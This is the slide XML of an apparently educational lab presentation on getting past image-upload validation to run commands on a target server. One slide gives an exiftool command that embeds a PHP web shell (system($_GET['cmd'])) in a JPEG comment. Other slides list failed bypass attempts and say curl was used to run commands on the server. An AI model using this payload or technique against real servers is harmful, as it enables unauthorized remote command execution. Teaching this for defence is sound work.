            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="3585795"/>
            <a:ext cx="11068050" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>exiftool -Comment='&lt;?php echo "&lt;pre&gt;"; system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>']); ?&gt;' file.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>mv file.jpg file.php.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23335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Failed Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits either because file upload was not allowed or hidden code did not execute in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mime-type:  GIF89a attack did not work and there was not enough time to install and configure a proxy server.  Therefore, modifying content headers to bypass mime-type was not possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File extension:  Double file extensions and null byte was tested but did not work.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getimagesize(): php files with a jpg extension were blocked by the getimagesize() function since the files did not have any image metadata</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81398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Successful Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mac machine used to embed php code in the “Comment” section of metadata for an image.  Since the file was an image it passed all file upload restrictions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, after uploading the file, the code would not execute in the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution: was to use curl() from the attacker machine to execute commands on the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6180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6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92BAFC58-03FA-7D48-9EC4-EA264BB2B3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773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Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Simple Image Upload Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>upload.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080764" y="3772746"/>
            <a:ext cx="5015236" cy="1051666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Content Placeholder 8"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397624" y="3443263"/>
            <a:ext cx="5337175" cy="1710632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188925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1468"/>
            <a:ext cx="9601200" cy="2282073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Upload Validation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The code implements ALL image file upload restrictions:  file extensions, mime-type, and getimagesize()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Content Placeholder 15"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2034808" y="2273554"/>
            <a:ext cx="8122383" cy="4179832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Slide Number Placeholder 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E1F13D-40A9-2F49-A9B4-495FF4F73CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594661" y="4894294"/>
            <a:ext cx="2006600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6115819E-E39D-F74A-B61B-1761AC1B3945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369326" y="5263626"/>
            <a:ext cx="2006600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>mime-type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125906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1A9398-F823-AC45-83BE-607C1630F9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD98162-5B10-0148-854D-32E1DFC776A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045432" y="2323810"/>
            <a:ext cx="8101136" cy="4217373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61F523BB-ACA7-574E-8D0D-7F64A830CA26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8238882" y="4033419"/>
            <a:ext cx="2032000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> file extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2A17E1-5BA0-0146-9347-AA7D0DAAE3FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="247806"/>
            <a:ext cx="9601200" cy="228207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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Upload Validation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The code implements ALL image file upload restrictions:  file extensions, mime-type, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368528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Overview and Objective</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following the continuous advancement of cryptographic protocols, hackers often target vulnerabilities with an application or employ various phishing attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main objective of any hacker focuses on compromising the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>onfidentiality, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ntegrity of the data or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vailability of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Objective: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The purpose of this project is to demonstrate how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>to imitate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a reverse shell on a remote system by exploiting vulnerabilities with image file upload restrictions. I will use a mechanism similar to a trojan horse in order to embed malicious code into my upload. This type of attack is especially dangerous as it can potentially compromise all aspects of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> triad.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> I will demonstrate how commands can be executed on a remote system without supplying authorized user credentials.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330938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Lab Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 virtual machines with Ubuntu Linux 20.04 LTS: attacker and target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 Mac machine to create the Trojan horse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Slide Number Placeholder 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866900" y="4667250"/>
            <a:ext cx="97155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5900" y="5238750"/>
            <a:ext cx="1752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78813" y="3609759"/>
            <a:ext cx="457200" cy="11620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45363" y="3604935"/>
            <a:ext cx="457200" cy="1162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75657" y="5549240"/>
            <a:ext cx="2373087" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Mac with exiftool to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>create Trojan horse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514874" y="4984254"/>
            <a:ext cx="1673728" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>192.168.1.205</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9837099" y="4972734"/>
            <a:ext cx="1673728" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>192.168.1.206</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
